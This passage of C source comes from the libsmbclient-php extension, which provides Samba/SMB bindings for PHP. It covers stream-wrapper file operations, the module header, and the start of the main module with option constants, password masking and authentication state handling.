php_smb_pool_drop(state TSRMLS_CC);
return 1;
}
if (options & REPORT_ERRORS) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Unlink fails: %s", strerror(errno));
}
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
static int
php_stream_smb_mkdir(
php_stream_wrapper *wrapper,
#if PHP_VERSION_ID < 50600
char *url,
#else
const char *url,
#endif
int mode,
int options,
php_stream_context *context
TSRMLS_DC)
{
php_smbclient_state *state;
smbc_mkdir_fn smbc_mkdir;
if (options & PHP_STREAM_MKDIR_RECURSIVE) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Recursive mkdir not supported");
return 0;
}
/* Context */
state = php_smb_pool_get(context, url TSRMLS_CC);
if (!state) {
return 0;
}
/* Mkdir */
if ((smbc_mkdir = smbc_getFunctionMkdir(state->ctx)) == NULL) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mkdir not supported");
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
if (smbc_mkdir(state->ctx, url, (mode_t)mode) == 0) {
php_smb_pool_drop(state TSRMLS_CC);
return 1;
}
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Mkdir fails: %s", strerror(errno));
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
static int
php_stream_smb_rmdir(
php_stream_wrapper *wrapper,
#if PHP_VERSION_ID < 50600
char *url,
#else
const char *url,
#endif
int options,
php_stream_context *context
TSRMLS_DC)
{
php_smbclient_state *state;
smbc_rmdir_fn smbc_rmdir;
/* Context */
state = php_smb_pool_get(context, url TSRMLS_CC);
if (!state) {
return 0;
}
/* Rmdir */
if ((smbc_rmdir = smbc_getFunctionRmdir(state->ctx)) == NULL) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Rmdir not supported");
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
if (smbc_rmdir(state->ctx, url) == 0) {
php_smb_pool_drop(state TSRMLS_CC);
return 1;
}
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Rmdir fails: %s", strerror(errno));
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
static int
php_stream_smb_rename(
php_stream_wrapper *wrapper,
#if PHP_VERSION_ID < 50600
char *url_from,
char *url_to,
#else
const char *url_from,
const char *url_to,
#endif
int options,
php_stream_context *context
TSRMLS_DC)
{
php_smbclient_state *state;
smbc_rename_fn smbc_rename;
/* Context */
state = php_smb_pool_get(context, url_from TSRMLS_CC);
if (!state) {
return 0;
}
if ((smbc_rename = smbc_getFunctionRename(state->ctx)) == NULL) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Rename not supported");
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
if (smbc_rename(state->ctx, url_from, state->ctx, url_to) == 0) {
php_smb_pool_drop(state TSRMLS_CC);
return 1;
}
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Rename fails: %s", strerror(errno));
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
static int php_smbdir_ops_close(php_stream *stream, int close_handle TSRMLS_DC)
{
smbc_closedir_fn smbc_closedir;
STREAM_DATA_FROM_STREAM();
if (close_handle) {
if (self->handle) {
smbc_closedir = smbc_getFunctionClosedir(self->state->ctx);
if (smbc_closedir) {
smbc_closedir(self->state->ctx, self->handle);
}
self->handle = NULL;
}
}
php_smb_pool_drop(self->state TSRMLS_CC);
efree(self);
stream->abstract = NULL;
return EOF;
}
#if PHP_VERSION_ID < 70400
static size_t php_smbdir_ops_read(php_stream *stream, char *buf, size_t count TSRMLS_DC)
#else
static ssize_t php_smbdir_ops_read(php_stream *stream, char *buf, size_t count TSRMLS_DC)
#endif
{
struct smbc_dirent *dirent;
php_stream_dirent *ent = (php_stream_dirent*)buf;
STREAM_DATA_FROM_STREAM();
if (!self || !self->handle) {
return 0;
}
/* avoid problems if someone mis-uses the stream */
if (count != sizeof(php_stream_dirent)) {
return 0;
}
if (!self->smbc_readdir) {
self->smbc_readdir = smbc_getFunctionReaddir(self->state->ctx);
}
if (self->smbc_readdir) {
if ((dirent = self->smbc_readdir(self->state->ctx, self->handle)) != NULL) {
PHP_STRLCPY(ent->d_name, dirent->name, sizeof(ent->d_name), dirent->namelen);
return sizeof(php_stream_dirent);
}
}
stream->eof = 1;
return 0;
}
static php_stream_ops php_stream_smbdir_ops = {
NULL,
php_smbdir_ops_read,
php_smbdir_ops_close,
NULL,
"smbdir",
NULL, /* rewind */
NULL, /* cast */
NULL, /* stat */
NULL /* set_option */
};
static php_stream *
php_stream_smbdir_opener(
php_stream_wrapper *wrapper,
#if PHP_VERSION_ID < 50600
char *path,
char *mode,
#else
const char *path,
const char *mode,
#endif
int options,
#if PHP_MAJOR_VERSION < 7
char **opened_path,
#else
zend_string **opened_path,
#endif
php_stream_context *context
STREAMS_DC TSRMLS_DC)
{
php_smbclient_state *state;
smbc_opendir_fn smbc_opendir;
SMBCFILE *handle;
php_smb_stream_data *self;
/* Context */
state = php_smb_pool_get(context, path TSRMLS_CC);
if (!state) {
return NULL;
}
/* Directory */
if ((smbc_opendir = smbc_getFunctionOpendir(state->ctx)) == NULL) {
php_smb_pool_drop(state TSRMLS_CC);
return NULL;
}
if ((handle = smbc_opendir(state->ctx, path)) == NULL) {
php_smb_pool_drop(state TSRMLS_CC);
return NULL;
}
self = ecalloc(sizeof(*self), 1);
self->state = state;
self->handle = handle;
return php_stream_alloc(&php_stream_smbdir_ops, self, NULL, mode);
}
static int
php_stream_smb_stat(
php_stream_wrapper *wrapper,
#if PHP_VERSION_ID < 50600
char *url,
#else
const char *url,
#endif
int flags,
php_stream_statbuf *ssb,
php_stream_context *context
TSRMLS_DC)
{
php_smbclient_state *state;
smbc_stat_fn smbc_stat;
/* Context */
state = php_smb_pool_get(context, url TSRMLS_CC);
if (!state) {
return 0;
}
/* Stat */
if ((smbc_stat = smbc_getFunctionStat(state->ctx)) == NULL) {
php_error_docref(NULL TSRMLS_CC, E_WARNING, "Stat not supported");
php_smb_pool_drop(state TSRMLS_CC);
return -1;
}
if (smbc_stat(state->ctx, url, &ssb->sb) >= 0) {
php_smb_pool_drop(state TSRMLS_CC);
return 0;
}
/* dont display error as PHP use this method internally to check if file exists */
php_smb_pool_drop(state TSRMLS_CC);
return -1;
}
#if PHP_VERSION_ID >= 50400
static int
php_stream_smb_metadata(
php_stream_wrapper *wrapper,
#if PHP_VERSION_ID < 50600
char *url,
#else
const char *url,
#endif
int option,
void *value,
php_stream_context *context
TSRMLS_DC)
{
php_smbclient_state *state;
smbc_chmod_fn smbc_chmod;
smbc_open_fn smbc_open;
smbc_utimes_fn smbc_utimes;
smbc_close_fn smbc_close;
mode_t mode;
struct utimbuf *newtime;
struct timeval times[2];
SMBCFILE *handle;
int ret = 0;
switch(option) {
case PHP_STREAM_META_TOUCH:
newtime = (struct utimbuf *)value;
/* Context */
state = php_smb_pool_get(context, url TSRMLS_CC);
if (!state) {
return 0;
}
/* Create + Utimes */
if ((smbc_open = smbc_getFunctionOpen(state->ctx)) == NULL
|| (smbc_close = smbc_getFunctionClose(state->ctx)) == NULL
|| (smbc_utimes = smbc_getFunctionUtimes(state->ctx)) == NULL) {
ret = -1;
break;
}
/* Create can fail if file exists, ignore result */
handle = smbc_open(state->ctx, url, O_EXCL|O_CREAT, 0666);
if (handle) {
smbc_close(state->ctx, handle);
}
if (newtime) {
times[0].tv_usec = 0;
times[0].tv_sec = newtime->actime;
times[1].tv_usec = 0;
times[1].tv_sec = newtime->modtime;
ret = smbc_utimes(state->ctx, url, times);
}
break;
case PHP_STREAM_META_ACCESS:
mode = (mode_t)*(long *)value;
/* Context */
state = php_smb_pool_get(context, url TSRMLS_CC);
if (!state) {
return 0;
}
/* Chmod */
if ((smbc_chmod = smbc_getFunctionChmod(state->ctx)) == NULL) {
ret = -1;
break;
}
ret = smbc_chmod(state->ctx, url, (mode_t)mode);
break;
default:
php_error_docref1(NULL TSRMLS_CC, url, E_WARNING, "Unknown option %d for stream_metadata", option);
return 0;
}
php_smb_pool_drop(state TSRMLS_CC);
if (ret == -1) {
php_error_docref1(NULL TSRMLS_CC, url, E_WARNING, "Operation failed: %s", strerror(errno));
return 0;
}
php_clear_stat_cache(0, NULL, 0 TSRMLS_CC);
return 1;
}
#endif
static php_stream_wrapper_ops smb_stream_wops = {
php_stream_smb_opener,
NULL, /* close */
NULL, /* fstat */
php_stream_smb_stat,
php_stream_smbdir_opener,
"smb",
php_stream_smb_unlink,
php_stream_smb_rename,
php_stream_smb_mkdir,
php_stream_smb_rmdir
#if PHP_VERSION_ID >= 50400
, php_stream_smb_metadata
#endif
};
php_stream_wrapper php_stream_smb_wrapper = {
&smb_stream_wops,
NULL,
1 /* is_url */
};
<|start_filename|>php_smbclient.h<|end_filename|>
/* ------------------------------------------------------------------
* This file is part of libsmbclient-php: Samba bindings for PHP.
* Libsmbclient-php is licensed under the BSD 2-clause license:
* ------------------------------------------------------------------
*
* Copyright (c) 2003, <NAME>
* 2009 - 2014, <NAME>
* 2013 - 2015, <NAME>
* 2015, <NAME>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials provided
* with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
* CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
* BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
* TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
* THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* ------------------------------------------------------------------
*/
#ifndef PHP_SMBCLIENT_H
#define PHP_SMBCLIENT_H
#include <libsmbclient.h>
#define PHP_SMBCLIENT_VERSION "1.0.6"
extern zend_module_entry smbclient_module_entry;
#define phpext_smbclient_ptr &smbclient_module_entry
typedef struct _php_smbclient_state
{
SMBCCTX *ctx;
char *wrkg;
char *user;
char *pass;
int wrkglen;
int userlen;
int passlen;
int err;
}
php_smbclient_state;
struct _php_smb_pool {
unsigned char hash[20];
php_smbclient_state *state;
struct _php_smb_pool *next;
int nb;
};
ZEND_BEGIN_MODULE_GLOBALS(smbclient)
struct _php_smb_pool *pool_first;
ZEND_END_MODULE_GLOBALS(smbclient)
extern ZEND_DECLARE_MODULE_GLOBALS(smbclient)
PHP_MINIT_FUNCTION(smbclient);
PHP_MSHUTDOWN_FUNCTION(smbclient);
PHP_RSHUTDOWN_FUNCTION(smbclient);
PHP_RINIT_FUNCTION(smbclient);
PHP_MINFO_FUNCTION(smbclient);
PHP_GINIT_FUNCTION(smbclient);
PHP_FUNCTION(smbclient_version);
PHP_FUNCTION(smbclient_library_version);
PHP_FUNCTION(smbclient_state_new);
PHP_FUNCTION(smbclient_state_init);
PHP_FUNCTION(smbclient_state_errno);
PHP_FUNCTION(smbclient_state_free);
PHP_FUNCTION(smbclient_option_get);
PHP_FUNCTION(smbclient_option_set);
PHP_FUNCTION(smbclient_client_protocols);
PHP_FUNCTION(smbclient_opendir);
PHP_FUNCTION(smbclient_readdir);
PHP_FUNCTION(smbclient_closedir);
PHP_FUNCTION(smbclient_rename);
PHP_FUNCTION(smbclient_unlink);
PHP_FUNCTION(smbclient_mkdir);
PHP_FUNCTION(smbclient_rmdir);
PHP_FUNCTION(smbclient_stat);
PHP_FUNCTION(smbclient_fstat);
PHP_FUNCTION(smbclient_open);
PHP_FUNCTION(smbclient_creat);
PHP_FUNCTION(smbclient_read);
PHP_FUNCTION(smbclient_write);
PHP_FUNCTION(smbclient_lseek);
PHP_FUNCTION(smbclient_ftruncate);
PHP_FUNCTION(smbclient_close);
PHP_FUNCTION(smbclient_chmod);
PHP_FUNCTION(smbclient_utimes);
PHP_FUNCTION(smbclient_listxattr);
PHP_FUNCTION(smbclient_getxattr);
PHP_FUNCTION(smbclient_setxattr);
PHP_FUNCTION(smbclient_removexattr);
PHP_FUNCTION(smbclient_statvfs);
PHP_FUNCTION(smbclient_fstatvfs);
/* If Zend Thread Safety (ZTS) is defined, each thread gets its own private
* php_smbclient_globals structure, the elements of which it can access
* through the SMBCLIENT() macro. Without ZTS, there is just one master
* structure in which we access the members directly: */
#if PHP_MAJOR_VERSION >= 7
#define SMBCLIENT_G(v) ZEND_MODULE_GLOBALS_ACCESSOR(smbclient, v)
#else
#ifdef ZTS
#define SMBCLIENT_G(v) TSRMG(smbclient_globals_id, zend_smbclient_globals *, v)
#else
#define SMBCLIENT_G(v) (smbclient_globals.v)
#endif
#endif
#if PHP_MAJOR_VERSION >= 8
#define TSRMLS_D void
#define TSRMLS_DC
#define TSRMLS_C
#define TSRMLS_CC
#define TSRMLS_FETCH()
#endif
extern php_stream_wrapper php_stream_smb_wrapper;
php_smbclient_state * php_smbclient_state_new (php_stream_context *context, int init TSRMLS_DC);
void php_smbclient_state_free (php_smbclient_state *state TSRMLS_DC);
int php_smbclient_state_init (php_smbclient_state *state TSRMLS_DC);
int flagstring_to_smbflags (const char *flags, int flags_len, int *retval TSRMLS_DC);
void php_smb_pool_cleanup(TSRMLS_D);
#endif /* PHP_SMBCLIENT_H */
<|start_filename|>smbclient.c<|end_filename|>
/* ------------------------------------------------------------------
* This file is part of libsmbclient-php: Samba bindings for PHP.
* Libsmbclient-php is licensed under the BSD 2-clause license:
* ------------------------------------------------------------------
*
* Copyright (c) 2003, <NAME>
* 2009 - 2014, <NAME>
* 2013 - 2015, <NAME>
* 2015, <NAME>
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above
* copyright notice, this list of conditions and the following
* disclaimer in the documentation and/or other materials provided
* with the distribution.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND
* CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
* INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
* MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
* DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
* BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED
* TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
* ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
* TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF
* THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* ------------------------------------------------------------------
*/
#define IS_EXT_MODULE
#ifdef HAVE_CONFIG_H
#include "config.h"
#endif
#include "php.h"
#include "ext/standard/info.h"
#include "php_smbclient.h"
ZEND_DECLARE_MODULE_GLOBALS(smbclient)
#define PHP_SMBCLIENT_STATE_NAME "smbclient state"
#define PHP_SMBCLIENT_FILE_NAME "smbclient file"
static int le_smbclient_state;
static int le_smbclient_file;
#if PHP_MAJOR_VERSION >= 7
typedef size_t strsize_t;
#else
typedef int strsize_t;
typedef long zend_long;
#endif
enum {
SMBCLIENT_OPT_OPEN_SHAREMODE = 1,
SMBCLIENT_OPT_ENCRYPT_LEVEL = 2,
SMBCLIENT_OPT_CASE_SENSITIVE = 3,
SMBCLIENT_OPT_BROWSE_MAX_LMB_COUNT = 4,
SMBCLIENT_OPT_URLENCODE_READDIR_ENTRIES = 5,
/* Ignore OneSharePerServer, not relevant to us. */
SMBCLIENT_OPT_USE_KERBEROS = 6,
SMBCLIENT_OPT_FALLBACK_AFTER_KERBEROS = 7,
/* Reverse the sense of this option, the original
* is the confusing "NoAutoAnonymousLogin": */
SMBCLIENT_OPT_AUTO_ANONYMOUS_LOGIN = 8,
SMBCLIENT_OPT_USE_CCACHE = 9,
SMBCLIENT_OPT_USE_NT_HASH = 10,
SMBCLIENT_OPT_NETBIOS_NAME = 11,
SMBCLIENT_OPT_WORKGROUP = 12,
SMBCLIENT_OPT_USER = 13,
SMBCLIENT_OPT_PORT = 14,
SMBCLIENT_OPT_TIMEOUT = 15,
}
php_smbclient_options;
static char *
find_char (char *start, char *last, char q)
{
char *c;
for (c = start; c <= last; c++) {
if (*c == q) {
return c;
}
}
return NULL;
}
static char *
find_second_char (char *start, char *last, char q)
{
char *c;
if ((c = find_char(start, last, q)) == NULL) {
return NULL;
}
return find_char(c + 1, last, q);
}
static void
astfill (char *start, char *last)
{
char *c;
for (c = start; c <= last; c++) {
*c = '*';
}
}
static void
hide_password (char *url, int len)
{
/* URL should have the form:
* smb://[[[domain;]user[:password@]]server[/share[/path[/file]]]]
* Replace everything after the second colon and before the next @
* with asterisks. */
char *last = (url + len) - 1;
char *second_colon;
char *slash;
char *at_sign;
if (len <= 0) {
return;
}
if ((second_colon = find_second_char(url, last, ':')) == NULL) {
return;
}
if ((slash = find_char(second_colon + 1, last, '/')) == NULL) {
slash = last + 1;
}
if ((at_sign = find_char(second_colon + 1, last, '@')) == NULL) {
astfill(second_colon + 1, slash - 1);
return;
}
if (at_sign > slash) {
at_sign = slash;
}
astfill(second_colon + 1, at_sign - 1);
}
/* {{{ arginfo */
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_void, 0)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_smbclient_state_init, 0, 0, 1)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, workgroup)
ZEND_ARG_INFO(0, user)
ZEND_ARG_INFO(0, password)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_state, 0)
ZEND_ARG_INFO(0, state)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_option_get, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, option)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_option_set, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, option)
ZEND_ARG_INFO(0, value)
ZEND_END_ARG_INFO()
#if HAVE_SMBC_SETOPTIONPROTOCOLS
ZEND_BEGIN_ARG_INFO_EX(arginfo_smbclient_client_protocols, 0, 0, 1)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, minproto)
ZEND_ARG_INFO(0, maxproto)
ZEND_END_ARG_INFO()
#endif
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_path, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, path)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_rename, 0)
ZEND_ARG_INFO(0, oldstate)
ZEND_ARG_INFO(0, oldpath)
ZEND_ARG_INFO(0, oldstate)
ZEND_ARG_INFO(0, oldpath)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_dir, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, dir)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_file, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, file)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_read, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, file)
ZEND_ARG_INFO(0, count)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_smbclient_open, 0, 0, 3)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, path)
ZEND_ARG_INFO(0, flags)
ZEND_ARG_INFO(0, mode)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_smbclient_creat, 0, 0, 2)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, path)
ZEND_ARG_INFO(0, mode)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_smbclient_write, 0, 0, 3)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, file)
ZEND_ARG_INFO(0, buffer)
ZEND_ARG_INFO(0, count)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_lseek, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, file)
ZEND_ARG_INFO(0, offset)
ZEND_ARG_INFO(0, whence)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_ftruncate, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, file)
ZEND_ARG_INFO(0, offset)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_utimes, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, path)
ZEND_ARG_INFO(0, mtime)
ZEND_ARG_INFO(0, atime)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO(arginfo_smbclient_getxattr, 0)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, path)
ZEND_ARG_INFO(0, name)
ZEND_END_ARG_INFO()
ZEND_BEGIN_ARG_INFO_EX(arginfo_smbclient_setxattr, 0, 0, 4)
ZEND_ARG_INFO(0, state)
ZEND_ARG_INFO(0, path)
ZEND_ARG_INFO(0, name)
ZEND_ARG_INFO(0, value)
ZEND_ARG_INFO(0, flags)
ZEND_END_ARG_INFO()
/* }}} */
static zend_function_entry smbclient_functions[] =
{
PHP_FE(smbclient_version, arginfo_smbclient_void)
PHP_FE(smbclient_library_version, arginfo_smbclient_void)
PHP_FE(smbclient_state_new, arginfo_smbclient_void)
PHP_FE(smbclient_state_init, arginfo_smbclient_state_init)
PHP_FE(smbclient_state_errno, arginfo_smbclient_state)
PHP_FE(smbclient_state_free, arginfo_smbclient_state)
PHP_FE(smbclient_option_get, arginfo_smbclient_option_get)
PHP_FE(smbclient_option_set, arginfo_smbclient_option_set)
#if HAVE_SMBC_SETOPTIONPROTOCOLS
PHP_FE(smbclient_client_protocols, arginfo_smbclient_client_protocols)
#endif
PHP_FE(smbclient_opendir, arginfo_smbclient_path)
PHP_FE(smbclient_readdir, arginfo_smbclient_dir)
PHP_FE(smbclient_closedir, arginfo_smbclient_dir)
PHP_FE(smbclient_stat, arginfo_smbclient_path)
PHP_FE(smbclient_fstat, arginfo_smbclient_file)
PHP_FE(smbclient_open, arginfo_smbclient_open)
PHP_FE(smbclient_creat, arginfo_smbclient_creat)
PHP_FE(smbclient_read, arginfo_smbclient_read)
PHP_FE(smbclient_close, arginfo_smbclient_file)
PHP_FE(smbclient_mkdir, arginfo_smbclient_creat)
PHP_FE(smbclient_rmdir, arginfo_smbclient_path)
PHP_FE(smbclient_rename, arginfo_smbclient_rename)
PHP_FE(smbclient_write, arginfo_smbclient_write)
PHP_FE(smbclient_unlink, arginfo_smbclient_path)
PHP_FE(smbclient_lseek, arginfo_smbclient_lseek)
PHP_FE(smbclient_ftruncate, arginfo_smbclient_ftruncate)
PHP_FE(smbclient_chmod, arginfo_smbclient_creat)
PHP_FE(smbclient_utimes, arginfo_smbclient_utimes)
PHP_FE(smbclient_listxattr, arginfo_smbclient_path)
PHP_FE(smbclient_getxattr, arginfo_smbclient_getxattr)
PHP_FE(smbclient_setxattr, arginfo_smbclient_setxattr)
PHP_FE(smbclient_removexattr, arginfo_smbclient_getxattr)
PHP_FE(smbclient_statvfs, arginfo_smbclient_path)
PHP_FE(smbclient_fstatvfs, arginfo_smbclient_file)
#ifdef PHP_FE_END
PHP_FE_END
#else
{NULL, NULL, NULL}
#endif
};
zend_module_entry smbclient_module_entry =
{ STANDARD_MODULE_HEADER
, "smbclient" /* name */
, smbclient_functions /* functions */
, PHP_MINIT(smbclient) /* module_startup_func */
, PHP_MSHUTDOWN(smbclient) /* module_shutdown_func */
, PHP_RINIT(smbclient) /* request_startup_func */
, PHP_RSHUTDOWN(smbclient) /* request_shutdown_func */
, PHP_MINFO(smbclient) /* info_func */
, PHP_SMBCLIENT_VERSION /* version */
, PHP_MODULE_GLOBALS(smbclient)
, PHP_GINIT(smbclient) /* globals ctor */
, NULL /* globals dtor */
, NULL /* post_deactivate_func */
, STANDARD_MODULE_PROPERTIES_EX
} ;
zend_module_entry old_module_entry = {
STANDARD_MODULE_HEADER,
"libsmbclient",
NULL,
NULL,
NULL,
NULL,
NULL,
NULL,
PHP_SMBCLIENT_VERSION,
STANDARD_MODULE_PROPERTIES,
};
#ifdef COMPILE_DL_SMBCLIENT
ZEND_GET_MODULE(smbclient)
#endif
static void
auth_copy (char *dst, char *src, size_t srclen, size_t maxlen)
{
if (dst == NULL || maxlen == 0) {
return;
}
if (src == NULL || srclen == 0) {
*dst = '\0';
return;
}
if (srclen < maxlen) {
memcpy(dst, src, srclen);
dst[srclen] = '\0';
return;
}
memcpy(dst, src, maxlen - 1);
dst[maxlen - 1] = '\0';
}
static void
smbclient_auth_func (SMBCCTX *ctx, const char *server, const char *share, char *wrkg, int wrkglen, char *user, int userlen, char *pass, int passlen)
{
/* Given context, server and share, return workgroup, username and password.
* String lengths are the max allowable lengths. */
php_smbclient_state *state;
if (ctx == NULL || (state = smbc_getOptionUserData(ctx)) == NULL) {
return;
}
auth_copy(wrkg, state->wrkg, (size_t)state->wrkglen, (size_t)wrkglen);
auth_copy(user, state->user, (size_t)state->userlen, (size_t)userlen);
auth_copy(pass, state->pass, (size_t)state->passlen, (size_t)passlen);
}
void
php_smbclient_state_free (php_smbclient_state *state TSRMLS_DC)
{
/* TODO: if smbc_free_context() returns 0, PHP will leak the handle: */
if (state->ctx != NULL && smbc_free_context(state->ctx, 1) != 0) {
switch (errno) {
case EBUSY: php_error(E_WARNING, "Couldn't destroy SMB context: connection in use"); break;
case EBADF: php_error(E_WARNING, "Couldn't destroy SMB context: invalid handle"); break;
default: php_error(E_WARNING, "Couldn't destroy SMB context: unknown error (%d)", errno); break;
}
}
if (state->wrkg != NULL) {
memset(state->wrkg, 0, state->wrkglen);
efree(state->wrkg);
}
if (state->user != NULL) {
memset(state->user, 0, state->userlen);
efree(state->user);
}
if (state->pass != NULL) {
memset(state->pass, 0, state->passlen);
efree(state->pass);
}
efree(state);
}
static inline void
smbclient_state_dtor (
#if PHP_MAJOR_VERSION >= 7
zend_resource *rsrc
#else
zend_rsrc_list_entry *rsrc
#endif
TSRMLS_DC)
{
php_smbclient_state_free((php_smbclient_state *)rsrc->ptr TSRMLS_CC);
}
static void
smbclient_file_dtor (
#if PHP_VERSION_ID >= 70000
zend_resource *rsrc
#else
zend_rsrc_list_entry *rsrc
#endif
TSRMLS_DC)
{
/* Because libsmbclient's file/dir close functions require a pointer to
* a context which we don't have, we cannot reliably destroy a file
* resource. One way of obtaining the context pointer could be to save
* it in a structure along with the file context, but the pointer could
* grow stale or otherwise spark a race condition. So it seems that the
* best we can do is nothing. The PHP programmer can either manually
* free the file resources, or wait for them to be cleaned up when the
* associated context is destroyed. */
}
PHP_GINIT_FUNCTION(smbclient)
{
smbclient_globals->pool_first = NULL;
}
PHP_MINIT_FUNCTION(smbclient)
{
/* Constants for smbclient_setxattr: */
REGISTER_LONG_CONSTANT("SMBCLIENT_XATTR_CREATE", SMBC_XATTR_FLAG_CREATE, CONST_PERSISTENT | CONST_CS);
REGISTER_LONG_CONSTANT("SMBCLIENT_XATTR_REPLACE", SMBC_XATTR_FLAG_REPLACE, CONST_PERSISTENT | CONST_CS);
/* Constants for getting/setting options: */
#define SMBCLIENT_CONST(x) REGISTER_LONG_CONSTANT(#x, x, CONST_PERSISTENT | CONST_CS);
SMBCLIENT_CONST(SMBCLIENT_OPT_OPEN_SHAREMODE);
SMBCLIENT_CONST(SMBCLIENT_OPT_ENCRYPT_LEVEL);
SMBCLIENT_CONST(SMBCLIENT_OPT_CASE_SENSITIVE);
SMBCLIENT_CONST(SMBCLIENT_OPT_BROWSE_MAX_LMB_COUNT);
SMBCLIENT_CONST(SMBCLIENT_OPT_URLENCODE_READDIR_ENTRIES);
SMBCLIENT_CONST(SMBCLIENT_OPT_USE_KERBEROS);
SMBCLIENT_CONST(SMBCLIENT_OPT_FALLBACK_AFTER_KERBEROS);
SMBCLIENT_CONST(SMBCLIENT_OPT_AUTO_ANONYMOUS_LOGIN);
SMBCLIENT_CONST(SMBCLIENT_OPT_USE_CCACHE);
SMBCLIENT_CONST(SMBCLIENT_OPT_USE_NT_HASH);
SMBCLIENT_CONST(SMBCLIENT_OPT_NETBIOS_NAME);
SMBCLIENT_CONST(SMBCLIENT_OPT_WORKGROUP);
SMBCLIENT_CONST(SMBCLIENT_OPT_USER);
